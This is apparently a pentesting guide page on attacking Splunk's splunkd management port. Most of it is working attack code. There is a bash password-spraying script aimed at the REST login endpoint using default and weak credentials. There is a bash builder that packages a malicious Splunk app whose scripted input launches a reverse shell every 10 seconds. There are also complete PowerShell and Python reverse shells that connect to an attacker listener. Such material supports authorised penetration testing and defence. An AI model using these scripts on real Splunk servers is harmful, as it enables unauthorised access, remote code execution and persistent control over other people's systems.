# 8089 - Pentesting Splunkd
## Basic Information
- Log analytics tool used for data gathering, analysis, and visualization
- Commonly used in security monitoring and business analytics
- Default ports:
  - Web server (Splunk Web): 8000
  - Splunkd service (management port and REST API): 8089
Vulnerability Vectors:

- Free Version Exploitation
  - The trial version automatically converts to the free version after 60 days
  - The free version lacks authentication
  - Potential security risk if left unmanaged, since administrators may overlook the security implications
- Credential Weaknesses
  - Older versions: default credentials `admin:changeme`
  - Newer versions: credentials are set during installation
  - Potential for weak passwords (e.g., `admin`, `Welcome`, `Password123`)
- Remote Code Execution Opportunities
  - Multiple code execution methods:
    - Server-side Django applications
    - REST endpoints
    - Scripted inputs
    - Alerting scripts
  - Cross-platform support (Windows/Linux)
  - Scripted inputs can run:
    - Bash scripts
    - PowerShell scripts
    - Batch scripts
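The credential weaknesses above are cheap to test directly against the management port, because splunkd exposes a REST login endpoint (`POST /services/auth/login`) that returns a `<sessionKey>` on success and an HTTP 401 with a `Login failed` message otherwise. The following is an added example (not code from the original page or from Splunk): `splunk_login` performs that request, `parse_session_key` extracts the key, and `spray_user` walks a short list of known-weak passwords for one user. The host, user names and the two sample responses are constructed placeholders. Keep the password list short: splunkd can lock out accounts after repeated failures (the lockout settings in `authentication.conf`).

```bash
#!/usr/bin/env bash
# Added example: test credentials against the splunkd management port (8089)
# via the REST login endpoint. HOST/USER/PASS values are placeholders.
set -e

# Extract the session key from a /services/auth/login XML response.
# Prints nothing when the response carries no <sessionKey> (login failed).
parse_session_key() {
  sed -n 's:.*<sessionKey>\([^<]*\)</sessionKey>.*:\1:p' | head -n 1
}

# POST username/password to /services/auth/login.
# -k because splunkd ships with a self-signed certificate by default.
splunk_login() {
  local host="$1" user="$2" pass="$3"
  curl -sk "https://${host}:8089/services/auth/login" \
       --data-urlencode "username=${user}" \
       --data-urlencode "password=${pass}" | parse_session_key
}

# Try each password for one user; print "user:pass" for the first that works.
# Returns 1 when none of them is accepted.
spray_user() {
  local host="$1" user="$2"; shift 2
  local pw key
  for pw in "$@"; do
    key=$(splunk_login "$host" "$user" "$pw")
    if [ -n "$key" ]; then
      echo "$user:$pw"
      return 0
    fi
  done
  return 1
}

# Constructed sample responses in the format splunkd returns (for offline testing).
SAMPLE_OK='<response>
<sessionKey>192fd3e46a31246da7ea7f109e7f95fd</sessionKey>
<messages><msg code=""></msg></messages>
</response>'
SAMPLE_FAIL='<response>
<messages><msg type="WARN" code="incorrect_username_or_password">Login failed</msg></messages>
</response>'

# Usage against a live target (placeholder host):
#   spray_user 10.10.10.10 admin changeme admin Welcome Password123
```

A returned session key can be reused for every other REST call on port 8089 by sending it as `Authorization: Splunk <sessionKey>`, which is what the app-upload step later on this page needs.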
Key Exploitation Potential:
- Sensitive data storage
- Lack of authentication in free version
- Multiple vectors for potential remote code execution
- Possibility of leveraging scripted inputs for system compromise
### Shodan

```
Splunk build
```

## RCE

### Create Custom Application
Splunk can be turned into a remote code execution primitive by deploying a custom application: apps may ship scripted inputs, and splunkd runs those scripts on a schedule with its own privileges. The technique is to package a malicious app whose script launches a reverse shell, and it works on both Windows and Linux hosts.

A custom application can run Python, Batch, Bash, or PowerShell scripts. Moreover, Splunk ships with its own Python interpreter, so even on Windows systems you can run Python code.

You can use this example, whose `bin` directory contains example scripts for Python and PowerShell, or you could create your own.
The exploitation process follows the same steps on every platform. The key configuration file is `default/inputs.conf`, which registers the script as a scripted input (a `[script://./bin/<script>]` stanza) and enables it by:

- Setting `disabled = 0`
- Configuring a 10-second execution interval (`interval = 10`)
- Defining the script's source type (`sourcetype`)

Deployment is straightforward:

1. Create the malicious application package (a `.tgz` or `.spl` archive of the app directory)
2. Set up a listener (Netcat/socat) on the attacking machine
3. Upload the application through Splunk's web interface (Apps > Manage Apps > Install app from file); this requires an administrative user, which is why default or weak credentials, or the unauthenticated free version, are what make this attack possible
4. The script is executed automatically once the app is installed and splunkd picks up the scripted input
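The whole procedure above, as an added example that is not part of the original page or of any real Splunk app: `build_app` lays out the app directory (`default/app.conf`, `default/inputs.conf`, `bin/rev.py`), writes the Linux Python reverse shell as the scripted input, and packages it as a `.tgz` ready for upload. The app name `revapp`, the output directory and the listener address are placeholder arguments. For a Windows target you would drop a `rev.ps1` plus a `run.bat` that invokes it into `bin/` and point the `[script://...]` stanza at the batch file instead.

```bash
#!/usr/bin/env bash
# Added example: assemble a Splunk app whose scripted input runs a reverse shell
# every 10 seconds. App name "revapp", OUTDIR, LHOST and LPORT are placeholders.
set -e

# build_app OUTDIR LHOST LPORT -> prints the path of the packaged app (.tgz)
build_app() {
  local outdir="$1" lhost="$2" lport="$3" app="revapp"
  mkdir -p "$outdir"
  outdir=$(cd "$outdir" && pwd)   # absolute path so tar -C behaves
  mkdir -p "$outdir/$app/bin" "$outdir/$app/default"

  # app.conf: minimal metadata so Splunk accepts and enables the app
  cat > "$outdir/$app/default/app.conf" <<EOF
[install]
is_configured = true
state = enabled

[ui]
is_visible = false
label = $app

[package]
id = $app
EOF

  # inputs.conf: register bin/rev.py as a scripted input that runs every 10 seconds
  cat > "$outdir/$app/default/inputs.conf" <<EOF
[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell
EOF

  # The payload: the Linux Python reverse shell from this page, parameterised.
  # Splunk runs *.py scripted inputs with its bundled Python interpreter.
  cat > "$outdir/$app/bin/rev.py" <<EOF
import socket, os, pty
s = socket.socket()
s.connect(("$lhost", $lport))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
EOF
  chmod +x "$outdir/$app/bin/rev.py"

  # Package the app directory; Splunk accepts .tgz (or .spl) uploads
  tar -C "$outdir" -czf "$outdir/$app.tgz" "$app"
  echo "$outdir/$app.tgz"
}

# list_app PKG -> sorted list of entries inside the package (sanity check before upload)
list_app() {
  tar -tzf "$1" | sort
}

# Usage (attacker side), then upload the .tgz via Apps > Manage Apps > Install app from file:
#   nc -lvnp 443
#   build_app /tmp/splunk 10.10.14.15 443
```

Check the package listing before uploading: the `default/inputs.conf` and `bin/rev.py` paths must sit under the app directory, since the `[script://./bin/rev.py]` stanza is resolved relative to the installed app.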
Sample Windows PowerShell reverse shell (`bin/rev.ps1`; change the IP and port to your listener):

```powershell
# Connect back to the attacker's listener and pipe an interactive shell over the socket
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()
```
Sample Linux Python reverse shell (`bin/rev.py`; change the IP and port to your listener):

```python
import socket, os, pty

ip = "10.10.14.15"   # attacker IP
port = 443           # attacker port (listener: nc -lvnp 443)

s = socket.socket()
s.connect((ip, port))
# Point stdin/stdout/stderr at the socket, then hand over an interactive bash
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')
```
## RCE & Privilege Escalation

The following page explains how this service can be abused to escalate privileges and obtain persistence once you have access to the host:
{{#ref}} ../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md {{#endref}}